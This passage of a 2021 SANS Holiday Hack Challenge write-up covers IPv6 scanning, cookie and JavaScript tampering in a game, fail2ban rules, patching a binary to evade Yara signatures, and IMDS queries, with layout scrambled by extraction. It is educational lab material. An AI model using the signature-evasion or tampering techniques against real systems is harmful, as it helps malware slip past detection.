64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
--- f02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 18ms
Rtt min/avg/max/mdev = 0.035/0.053/0.077/0.018 ms

Examining our local system, we see that c0ff:fea8:a003 is our local system, so two of the listed IPv6 addresses belong
to us. We can look at the other two using nmap to see what services are running on them.
Next we use curl to retrieve information on port 80 of IP a002, since this is the only IP that appears to be hosting any
web services.
Okay. Let’s connect to the other port to get the striper’s activation phrase using curl.
Now we have the correct phrase to engage the candy striper and can enter it in the answer screen
Entering the correct phrase solves the challenge. We will now receive the hints from Jewel Logins for Objective 5 and
the achievement IPv6 Sandbox.
3.5 Holiday Hero
This terminal is a Guitar Hero style game. In order to complete the achievement for this game you must get over 80%
fuel into the sleigh. You can do this by playing a two-player game and being the primary player on the left, or by
accessing single-player mode and filling the sleight over 80% on your own. There is only one hint given by Chimney
Scissorsticks for this game and it does not persist in the badge hint area. The hint is as follows:
elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]:80/ --interface eth0
<html>
<head><title>Candy Striper v6</title></head>
<body>
<argquee>Connect to the other open TCP port to get the striper’s activation phrase!</marquee>
</body>
</html>
elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]9000/ --interface eth0
PieceOnEarth
ENTER THE CORRECT PHRASE TO ENGAGE THE CANDY STRIPER
> PieceOnEarth
Your answer: PieceOnEarth
Checking…
CANDY STRIPER REENGAGED. THANK YOU!
elf@9e1d8554e176:~$ nmap -6 -T 5 –top-port 250 fe80::42:d7ff:fe9d:1bd%eth0
Starting Nmap 7.70 (https://nmap.org) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:d7ff:fe9d:1bd
Host is up (0.000087s latency).
Not shown: 248 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
elf@9e1d8554e176:~$ nmap -6 -T 5 –top-port 250 fe80::42:c0ff:fea8:a002
Starting Nmap 7.70 (https://nmap.org) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000091s latency).
Not shown: 248 closed ports
PORT STATE SERVICE
80/tcp open http
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

• Untitled Hint – There’s a clever way to enable single player mode. It can be enabled by fiddling with two
client-side values. One of which is passed on to the server.
The first value can be found when examining the application cookies. The cookie is HOHOHO and it has the value
%7B%22single_player%22%3Afalse%7D. We much change this cookie to be %7B%22single_player%22%3Atrue
%7D.
After changing the cookie and entering the room, you can start playing the game by yourself, but the button for the
other player do not automatically get pressed like they should. In order to remedy this, we also have to change the
Javascript variable sing_plyaer_mode to true as well before we start the game. This can be done by going to Sources
→ Console → Selecting hero.kringlecastle.com as the context as then typing single_player_mode=true in the console
window after creating a room but before you begin playing the game. This was done by setting a breakpoint on the
first line shown below.
You can now play the game and the player two buttons will automatically be counted as correct and animations will
play during the game showing that they are being counted as correct.
After doing this and completing the game as a single player, you will receive the Holiday Hero achievement.
3.6 HoHo...No
In this challenge, you are asked to configure fail2ban with custom rules. This requires you to create and craft a
fail2ban filter file, jail file and action file. Instructions for this terminal are shown below.

The first thing we should do is filter the log file to find the common types of bad logs so we can build our patterns.
This can be done using standard Linux tools.
Now that we have a pattern for the logs we are looking for, lets start by developing our filter file. This file will be in
the fail2ban /etc directory under filter.d/santa.conf and will match all for the logs for the patterns we are interested in
filtering.
Let us add the actions for what we want fail2ban to do when we find an IP address has violated our rules. This will be
under the fail2ban /etc/directory under action.d/santa.conf.
Finally, we need to develop a custom jail that lets fail2ban know where to find our log file, filter, and action direction,
as well as setting rules/windows for detection, banning, and unbanning. That file will be located under the fail2ban
/etc directory under jail.d/santa.conf.
Jack is trying to break into Santa’s workshop!
Santa’s elves are working 24/7 to manually look through logs, identify the
malicious IP addresses, and block them. We need your help to automate this
so the elves can get back to making presents!
Can you configure Fail2Ban to detect and block the bad IPs?
* You must monitor for new log entries in /var/log/hohono.log
* If an IP generates 10 or more failure messages within an hour then it must
be added to the naughty list by running naughtylist add <ip>
/root/naughtylist add 12.34.56.78
* You can also remove an IP with naughtylist del <ip>
/root/naughtylist del 12.34.56.78
* You can check which Ips are currently on the naughty list by running
/root/naughtylist list
You’ll be rewarded if you correctly identify all the malicious IPs with a
Fail2Ban filter in /etc/fail2ban/filter.d, and action to ban and unban in
/etc/fail2ban/action.d, and a custom jail in /etc/fail2ban/jail.d. Don’t
add any nice IPs to the naughty list!
*** IMPORTANT NOTE! ***
Fail2Ban won’t rescan any logs it has already seen. That means it won’t
automatically process the log file each time you make changes to the Fail2Ban
config. When needed, run /root/naughtylist refresh to re-sample the log file
And tell Fail2Ban to reproccess it.
root@fe3682bbf503:~# cat /var/log/hohono.log | grep -v success | grep -v Valid | cut -f 3- -d ‘ ‘ | sed -
e ‘s/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/x.x.x.x/g’ | sed -e ‘s/alpha|bravo|
charlie|delta/xxxxxx/g’ | sed -e ‘s/for [a-z]+/for xxxxxx/g’ | sort | uniq
Failed login from x.x.x.x for xxxxxx
Invalid heartbeat ‘xxxxxx’ from x.x.x.x
Login from x.x.x.x rejected due to unknown user name
x.x.x.x sent a malformed request
[Definition]
failregex = ^.* <HOST> sent a malformed request$
^.* Login from <HOST> rejected due to unknown user name$
^.* Invalid heartbeat 'w+' from <HOST>$
^.* Failed login from <HOST> for w+$
[Definition]
actionstart=/root/naughtylist refresh
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>

Now we can restart fail2ban and it will automatically detect all the bad hosts and block them.
Upon completing this challenge, we can talk with Eve Snowshoes to get hints for Objective 8 – Kerberoasting on an
Open Fire. We also receive the HoHo … No achievement.
3.7 Yara Analysis
This terminal challenge requires you to modify and executable to get it to execute without being caught by Yara rules.
No hints were given for this challenge besides those given in the dialog with Fizy Shortstacks. Solving this challenge
earns you hints for the Splunk objective from Fizy. Upon executing the program the first time we find the following:
Examining Yara rule 135, we find it shows the following.
root@fe3682bbf503:~/etc/fail2ban/jail.d# service fail2ban restart
* Restarting Authentication failure monitor fail2ban
Log file refreshed! It may take fail2ban a few moments to re-process
144.115.185.234 has been added to the naughty list!
222.132.239.194 has been added to the naughty list!
...
***********************************************************************
* You stopped the attacking systems! You saved our systems!
*
* Thank you for all of your help. You are a talented defender!
**********************************************************************
HELP!!!
This critical application is supposed to tell us the sweetness levels of our candy
manufacturing output (among other important things), but I can't get it to run.
It keeps saying something something yara. Can you take a look and see if you
can help get this application to bypass Sparkle Redberry's Yara scanner?
If we can identify the rule that is triggering, we might be able change the program
to bypass the scanner.
We have some tools on the system that might help us get this application going:
vim, emacs, nano, yara, and xxd
The children will be very disappointed if their candy won't even cause a single cavity.
snowball2@5a4e406f3ee8:~$ ls
the_critical_elf_app yara_rules
snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_135 ./the_critical_elf_app
[santa_jail]
enabled = true
logpath = /var/log/hohono.log
findtime = 1h
maxretry = 10
bantime = 1h
filter = santa
action = santa

We can use vim and xxd to edit the file and modify the string candy cane to get the executable to bypass rule 135.
After making this change and rerunning the application we get the following result:
Examing rule 1056 we find:
This rule is looking for two specific hex strings and all of the string must match in order for this rule to be activated.
Let’s edit our file again in vim with xxd. Looking at the first string, it looks like it is reference to a Linux library so I
probably can’t be changed.
The next hex string looks like a candidate:
We can change the first 21 to a 23 to change !! into #! and that should get us past rule 1056. Sure enough, upon
execution we find the following:
Now we need to bypass rule 1732. Let’s look at the rule:
rule yara_rule_135 {
meta:
description = "binaries - file Sugar_in_the_machinery"
author = "Sparkle Redberry"
reference = "North Pole Malware Research Lab"
date = "1955-04-21"
hash = "19ecaadb2159b566c39c999b0f860b4d8fc2824eb648e275f57a6dbceaf9b488"
strings:
$s = "candycane"
condition:
$s
}
00002000: 0100 0200 0000 0000 6361 6e64 7963 616d ........candycam
00002010: 6500 6e61 7567 6874 7920 7374 7269 6e67 e.naughty string
ule yara_rule_1056 {
meta:
description = "binaries - file frosty.exe"
author = "Sparkle Redberry"
date = "1955-04-21"
hash = "b9b95f671e3d54318b3fd4db1ba3b813325fcef462070da163193d7acb5fcd03"
strings:
$s1 = {6c 6962 632e 736f 2e36}
$hs2 = {726f 6772 616d 2121}
condition:
all of them
}
00000450: 0000 0000 0000 0000 006c 6962 632e 736f .........libc.so
00000460: 2e36 005f 5f63 7861 5f66 696e 616c 697a .6.__cxa_finaliz
00002050: 6973 2070 726f 6772 616d 2121 0000 0000 is program!!....
00002060: 486f 6c69 6461 7948 6163 6b43 6861 6c6c HolidayHackChall

There are 20 strings listed in this rule, most of them critical to the function of the program and they cannot be
changed. At least 10 of the strings have to match for this rule to fire, but the file size must also be under 50kb. Let’s
see if we can inflate the size of this file past 50kb and get the file.
Now we can run the app and bypass the final yara rule. We are awarded the Yara Analysis achievement.
3.8 IMDS Exploration
The IMDS Exploration terminal is a Jack Frost’s bathroom and solving the terminal is required to get hints for
Objective 10 from Noxious O Dior. This terminal is a walk through and requires you to complete all the steps in the
walk through so no hints for the terminal are given. The list of steps to solve this challenge are listed below.
🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills,
🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl.
🎄🎄🎄
🎄🎄🎄 If you get stuck, run 'hint' for assitance.
🎄🎄🎄
Are you ready to begin? [Y]es: Y
The Instance Metadata Service (IMDS) is a virtual server for cloud assets at the IP address
169.254.169.254. Send a couple ping packets to the server.
elfu@ef2c3d6109b8:~$ ping 169.254.169.254 -c 2
PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.
64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.017 ms
64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.037 ms
--- 169.254.169.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1010ms
rtt min/avg/max/mdev = 0.017/0.027/0.037/0.010 ms
IMDS provides information about currently running virtual machine instances. You can use it
to manage and configure cloud nodes. IMDS is used by all major cloud providers.
Run 'next' to continue.010ms
elfu@ef2c3d6109b8:~$ next
Developers can automate actions using IMDS. We'll interact with the server using the cURL
tool. Run 'curl http://169.254.169.254' to access IMDS data.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254
latest
rule yara_rule_1732 {
meta:
description = "binaries - alwayz_winter.exe"
author = "Santa"
date = "1955-04-22"
hash = "c1e31a539898aab18f483d9e7b3c698ea45799e78bddc919a7dbebb1b40193a8"
strings:
$s1 = "This is critical for the execution of this program!!" fullword ascii
...
$s20 = "__libc_csu_init" fullword ascii
condition:
uint32(1) == 0x02464c45 and filesize < 50KB and
10 of them
}
head -c 52224 /dev/random >> ./the_critical_elf_app

Different providers will have different formats for IMDS data. We're using an AWS-compatible
IMDS server that returns 'latest' as the default response. Access the 'latest' endpoint.
Run 'curl http://169.254.169.254/latest'
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest
dynamic
meta-data
IMDS returns two new endpoints: dynamic and meta-data. Let's start with the dynamic
endpoint, which provides information about the instance itself. Repeat the request
to access the dynamic endpoint: 'curl http://169.254.169.254/latest/dynamic'.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic
fws/instance-monitoring
instance-identity/document
instance-identity/pkcs7
instance-identity/signature
Much of the data retrieved from IMDS will be returned in JavaScript Object Notation (JSON)
format. Piping the output to 'jq' will make the content easier to read.
Re-run the previous command, sending the output to JQ: 'curl
http://169.254.169.254/latest/dynamic/instance-identity/document | jq'
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document | q
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 451 100 451 0 0 440k 0 --:--:-- --:--:-- --:--:-- 440k
{
"accountId": "PCRVQVHN4S0L4V2TE",
"imageId": "ami-0b69ea66ff7391e80",
"availabilityZone": "np-north-1f",
"ramdiskId": null,
"kernelId": null,
"devpayProductCodes": null,
"marketplaceProductCodes": null,
"version": "2017-09-30",
"privateIp": "10.0.7.10",
"billingProducts": null,
"instanceId": "i-1234567890abcdef0",
"pendingTime": "2021-12-01T07:02:24Z",
"architecture": "x86_64",
"instanceType": "m4.xlarge",
"region": "np-north-1"
}
The instance identity document can be used by developers to understand the instance details.
Repeat the request, this time requesting the instance-identity/document resource:
'curl http://169.254.169.254/latest/dynamic/instance-identity/document'.
elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document
{
"accountId": "PCRVQVHN4S0L4V2TE",
"imageId": "ami-0b69ea66ff7391e80",
"availabilityZone": "np-north-1f",
"ramdiskId": null,
"kernelId": null,
"devpayProductCodes": null,
"marketplaceProductCodes": null,
"version": "2017-09-30",
"privateIp": "10.0.7.10",
"billingProducts": null,
"instanceId": "i-1234567890abcdef0",
"pendingTime": "2021-12-01T07:02:24Z",
"architecture": "x86_64",
"instanceType": "m4.xlarge",
"region": "np-north-1"
} elfu@ef2c3d6109b8:~$

2021 SANS Holiday Hack Report

Recommandé

Recommandé

Contenu connexe

Similaire à 2021 SANS Holiday Hack Report

Similaire à 2021 SANS Holiday Hack Report (20)

Dernier

Dernier (20)

2021 SANS Holiday Hack Report